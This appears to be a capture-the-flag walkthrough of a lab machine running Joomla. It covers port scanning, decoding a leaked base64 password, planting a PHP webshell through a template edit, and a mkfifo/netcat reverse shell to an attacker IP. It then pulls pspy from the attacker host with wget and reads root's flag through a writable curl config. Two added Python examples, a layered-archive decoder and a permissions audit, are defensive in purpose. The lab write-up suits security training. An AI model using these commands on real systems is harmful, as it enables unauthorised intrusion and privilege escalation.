Basic information

Port scan

Ports 22 and 80 are open:

$ nmap -sC -sV 10.10.10.150
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-28 15:25 CST
Nmap scan report for 10.10.10.150
Host is up (0.068s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
| 256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_ 256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.60 seconds

80

It is a Joomla site. The page content gives a username, Floris, and a secret.txt referenced in a page comment gives a password:

secret.txt

Q3VybGluZzIwMTgh

$ echo 'Q3VybGluZzIwMTgh' | base64 -d
Curling2018!

Joomla

The username and password obtained above can then be used to log in to Joomla:

Floris : Curling2018!

An error at this point does not affect the following steps:

webshell

This just means editing a template file and changing its PHP code:

Extensions > Templates > Templates > Protostar:

reverse shell

Mind the encoding, mainly that & has to be encoded as %26:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.15 4445 >/tmp/f

python3 -c "import pty;pty.spawn('/bin/bash')"

User information

We are currently the www-data user and need to get to the floris user. There is a password_backup file in /home/floris; download it and analyze it:

nc -lvvp 4446 > password_backup
nc 10.10.14.15 4446 < password_backup

Looking at password_backup shows it is a hexdump. What follows is inspecting the content, confirming the format of each layer and decoding it (a tedious process; CyberChef makes it easy):

$ cat password_backup | xxd -r > bak
$ file bak
bak: bzip2 compressed data, block size = 900k
$ bzip2 -d bak
bzip2: Can't guess original name for bak -- using bak.out
$ file bak.out
bak.out: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix, original size modulo 2^32 141
$ mv bak.out bak.gz
$ gzip -d bak.gz
$ file bak
bak: bzip2 compressed data, block size = 900k
$ bzip2 -d bak
bzip2: Can't guess original name for bak -- using bak.out
$ file bak.out
bak.out: POSIX tar archive (GNU)
$ tar xf bak.out
$ cat password.txt
5d<wdCbdZu)|hChXll
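The unwrapping sequence above (hexdump, then bzip2, gzip, bzip2 and finally tar) can be automated by sniffing each layer's magic bytes instead of running file by hand. The following Python is an added example and not the writeup's own code: it builds a constructed nested blob around a made-up password, reverses the xxd layout the way xxd -r does, and peels the layers with an output-size cap so an unexpected decompression bomb is refused rather than expanded. It goes beyond the page in also recognising xz; the function names and the sample data are assumptions made for the example.

```python
import binascii
import bz2
import gzip
import io
import lzma
import re
import tarfile
import zlib

MAX_OUT = 64 * 1024 * 1024  # refuse any single layer that expands past 64 MiB


def identify(data: bytes) -> str:
    """Name the container by its magic bytes (tar's 'ustar' sits at offset 257)."""
    if data.startswith(b"BZh"):
        return "bzip2"
    if data.startswith(b"\x1f\x8b"):
        return "gzip"
    if data.startswith(b"\xfd7zXZ\x00"):
        return "xz"
    if len(data) > 262 and data[257:262] == b"ustar":
        return "tar"
    return "unknown"


def xxd_reverse(text: str) -> bytes:
    """Turn the classic xxd layout back into bytes, as `xxd -r` does."""
    out = bytearray()
    for line in text.splitlines():
        # offset, colon, hex groups; the ASCII column after the double space is ignored
        m = re.match(r"^[0-9a-fA-F]+:\s+((?:[0-9a-fA-F]{2} ?)+)", line)
        if m:
            out += binascii.unhexlify(m.group(1).replace(" ", ""))
    return bytes(out)


def _bounded(decomp, data: bytes) -> bytes:
    """Decompress with a hard cap on the produced size."""
    out = decomp.decompress(data, MAX_OUT + 1)
    if len(out) > MAX_OUT:
        raise ValueError("layer expands past MAX_OUT; refusing (possible decompression bomb)")
    return out


def unwrap(data: bytes, max_layers: int = 16):
    """Peel compression layers until a tar archive or unknown data is reached.

    Returns (layer_names, files): files maps member name -> bytes for a tar
    archive, or {"<raw>": data} for anything not recognised.
    """
    layers = []
    for _ in range(max_layers):
        kind = identify(data)
        layers.append(kind)
        if kind == "bzip2":
            data = _bounded(bz2.BZ2Decompressor(), data)
        elif kind == "gzip":
            data = _bounded(zlib.decompressobj(wbits=31), data)  # 31 = gzip framing
        elif kind == "xz":
            data = _bounded(lzma.LZMADecompressor(), data)
        elif kind == "tar":
            with tarfile.open(fileobj=io.BytesIO(data)) as tf:
                files = {m.name: tf.extractfile(m).read()
                         for m in tf.getmembers() if m.isfile()}
            return layers, files
        else:
            return layers, {"<raw>": data}
    raise ValueError("too many nested layers")


def xxd_dump(data: bytes) -> str:
    """Produce xxd's default layout (constructed here only to build sample input)."""
    lines = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        hexpart = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        ascii_part = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {hexpart:<39}  {ascii_part}")
    return "\n".join(lines) + "\n"


def build_sample(secret: bytes) -> str:
    """Constructed sample: tar(password.txt) -> bzip2 -> gzip -> bzip2 -> hexdump."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo("password.txt")
        info.size = len(secret)
        tf.addfile(info, io.BytesIO(secret))
    blob = bz2.compress(gzip.compress(bz2.compress(buf.getvalue())))
    return xxd_dump(blob)


if __name__ == "__main__":
    dump = build_sample(b"constructed-password\n")  # made-up value, not the box's
    layers, files = unwrap(xxd_reverse(dump))
    print(layers, files)
```

Each layer is identified before it is opened, so the loop stops cleanly on data it does not know instead of guessing, and the size cap turns a hostile archive into an exception rather than an out-of-memory condition.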

user flag

The password obtained is the floris user's password; SSH in directly with it to get user.txt:

Privilege escalation information

wget http://10.10.14.15:7777/pspy64
chmod +x pspy64
./pspy64

The admin-area directory contains input and report. report appears to hold the content of the URL given in input, and the pspy64 output shows that root periodically fetches the URL in input with curl and writes the result to report:

Both input and the output file report are writable by us, so we can read and write files arbitrarily.
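From a defender's side, the condition just described (a privileged scheduled job that consumes a file a lower-privileged user can modify) is something to audit for rather than discover in a report. The following Python is an added example, not code from the writeup: it checks each input path a privileged job reads for group/world write bits and for a parent directory that is writable by others without the sticky bit (which allows the file to be replaced). The helper names and the throwaway directory layout it builds under a temporary directory are constructed for the example.

```python
import os
import stat
import tempfile

OTHERS_WRITE = stat.S_IWGRP | stat.S_IWOTH  # simplification: group write is treated as risky


def writable_by_others(path: str) -> bool:
    """True if the file itself carries a group or world write bit."""
    return bool(os.lstat(path).st_mode & OTHERS_WRITE)


def replaceable_in_parent(path: str) -> bool:
    """True if the containing directory lets others unlink/rename the file."""
    parent = os.path.dirname(os.path.abspath(path))
    mode = os.lstat(parent).st_mode
    return bool(mode & OTHERS_WRITE) and not bool(mode & stat.S_ISVTX)


def audit_job_inputs(paths):
    """Map each path to a list of reasons it is risky (empty list = no finding)."""
    findings = {}
    for p in paths:
        reasons = []
        if writable_by_others(p):
            reasons.append("file is group/world-writable")
        if replaceable_in_parent(p):
            reasons.append("parent directory is writable by others without sticky bit")
        findings[p] = reasons
    return findings


def build_demo():
    """Constructed layout: one hardened input file and one loose input file."""
    root = tempfile.mkdtemp()
    safe = os.path.join(root, "safe", "input")
    loose = os.path.join(root, "admin-area", "input")  # name borrowed from the writeup
    for p in (safe, loose):
        os.makedirs(os.path.dirname(p))
        with open(p, "w") as fh:
            fh.write('url = "http://127.0.0.1/"\n')  # placeholder content
    os.chmod(os.path.dirname(safe), 0o755)
    os.chmod(safe, 0o644)
    os.chmod(os.path.dirname(loose), 0o777)
    os.chmod(loose, 0o666)
    return safe, loose


if __name__ == "__main__":
    safe, loose = build_demo()
    for path, reasons in audit_job_inputs([safe, loose]).items():
        print(path, "->", reasons or ["ok"])
```

The check works from mode bits only, so it gives the same answer whether it is run as root or as an unprivileged user; a fuller audit would also compare the file's owner and group against the users who should be allowed to edit it.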

root flag

Simply modify input, and the root flag appears in report:

url = "file:///root/root.txt"

References